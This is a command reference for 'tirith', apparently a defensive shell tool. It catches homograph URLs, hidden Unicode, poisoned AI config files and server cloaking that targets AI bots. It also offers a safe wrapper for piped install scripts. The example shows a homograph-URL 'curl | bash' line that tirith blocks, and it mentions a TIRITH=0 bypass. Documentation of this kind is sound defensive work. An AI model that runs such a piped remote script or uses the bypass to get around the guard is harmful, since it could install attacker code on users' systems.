Commands

Complete reference for all tirith CLI commands.

Exit Codes#

0Allow — no issues found
1Block — high/critical severity findings
2Warn — medium/low severity findings

COREDetection & Analysis#

tirith check -- <cmd>

Analyze a command without executing it. Useful for testing what tirith would flag.

shell
$ tirith check -- curl -sSL https://іnstall.example-clі.dev | bash
shell
tirith: BLOCKED
[CRITICAL] non_ascii_hostname — Cyrillic і (U+0456) in hostname
This is a homograph attack. The URL visually mimics a legitimate
domain but resolves to a completely different server.
Bypass: prefix your command with TIRITH=0 (applies to that command only)

Supports --json, --non-interactive, and --shell flags for CI/scripting use.

tirith paste

Reads from stdin and analyzes pasted content for ANSI escapes, bidi controls, zero-width characters, and hidden content. The shell hook calls this automatically when you paste into the terminal.

shell
$ echo 'some content' | tirith paste

tirith score <url>

Breaks down a URL's trust signals — TLS, domain age heuristics, known shorteners, Unicode analysis.

shell
$ tirith score https://bit.ly/something

tirith diff <url>

Byte-level comparison showing exactly where suspicious characters are hiding.

shell
$ tirith diff https://exаmple.com
shell
Position 3: expected 0x61 (Latin a) | got 0xd0 0xb0 (Cyrillic а)

tirith why

Explains the last rule that triggered — what it detected, why it matters, and what to do about it.

shell
$ tirith why

SAFESafe Execution#

tirith run <url>

Safe replacement for curl | bash. Downloads to a temp file, shows SHA256, runs static analysis, opens in a pager for review, and executes only after you confirm. Creates a receipt for later verification.

shell
$ tirith run https://get.docker.com

tirith receipt {last,list,verify}

Track and verify scripts you've run through tirith run. Each execution creates a receipt with the script's SHA256 hash for auditing.

shell
$ tirith receipt last # show the most recent receipt
$ tirith receipt list # list all receipts
$ tirith receipt verify <sha256> # verify a specific receipt

tirith checkpoint {create,list,restore,diff,purge}

Snapshot files before risky operations, then roll back if something goes wrong.

shell
$ tirith checkpoint create ~/.bashrc ~/.zshrc # snapshot before changes
$ tirith checkpoint list # list all checkpoints
$ tirith checkpoint diff <id> # show what changed
$ tirith checkpoint restore <id> # roll back
$ tirith checkpoint purge # clean up old checkpoints

SCANScanning & Detection#

tirith scan [path]

Scan files and directories for hidden content, config poisoning, invisible Unicode, and MCP configuration issues. Supports SARIF output for CI integration.

shell
$ tirith scan . # scan current directory
$ tirith scan --file .cursorrules # scan a specific file
$ tirith scan --ci --fail-on high # exit non-zero if findings meet threshold
$ tirith scan --sarif # SARIF 2.1.0 output for CI tools

Prioritizes and scans 50+ known AI config file patterns including .cursorrules, CLAUDE.md, .mcp.json, and more.

tirith fetch <url>

Check a URL for server-side cloaking — detects when a server returns different content to AI bots vs browsers. Compares responses across 6 user-agents (Chrome, ClaudeBot, ChatGPT-User, PerplexityBot, Googlebot, curl).

shell
$ tirith fetch https://example.com/install.sh

AIAI Agent Security#

tirith mcp-server

Run tirith as an MCP server over JSON-RPC stdio. Provides 7 security tools that AI coding agents can call on demand.

shell
$ tirith mcp-server

See the MCP Integration docs for per-tool setup guides.

tirith gateway {run,validate-config}

MCP gateway proxy that intercepts AI agent shell tool calls for security analysis before execution.

shell
$ tirith gateway run --upstream-bin npx --upstream-arg mcp-server --config gateway.yaml
$ tirith gateway validate-config --config gateway.yaml

tirith setup <tool>

One-command setup for AI coding tools. Configures shell hooks, MCP server registration, and zshenv guards.

shell
$ tirith setup claude-code --with-mcp # Claude Code + MCP server
$ tirith setup codex # OpenAI Codex
$ tirith setup cursor # Cursor
$ tirith setup vscode # VS Code
$ tirith setup windsurf # Windsurf

MGMTManagement & Diagnostics#

tirith init

Prints the shell hook for your current shell. Add the eval line to your shell profile to activate tirith.

shell
$ eval "$(tirith init --shell zsh)" # in ~/.zshrc
$ eval "$(tirith init --shell bash)" # in ~/.bashrc
$ tirith init --shell fish | source # in ~/.config/fish/config.fish

tirith doctor

Diagnostic check — shows detected shell, hook status, policy file location, and configuration. Run this if something isn't working.

shell
$ tirith doctor

tirith audit {export,stats,report}

Audit log management for compliance and analysis.

shell
$ tirith audit export --format csv --since 2025-01-01
$ tirith audit stats --json
$ tirith audit report --format html --since 2025-01-01

tirith activate <key>

Activate a license key for Team/Enterprise features.

shell
$ tirith activate <your-signed-token>

tirith license

Show or manage license status. Subcommands: deactivate, refresh.

shell
$ tirith license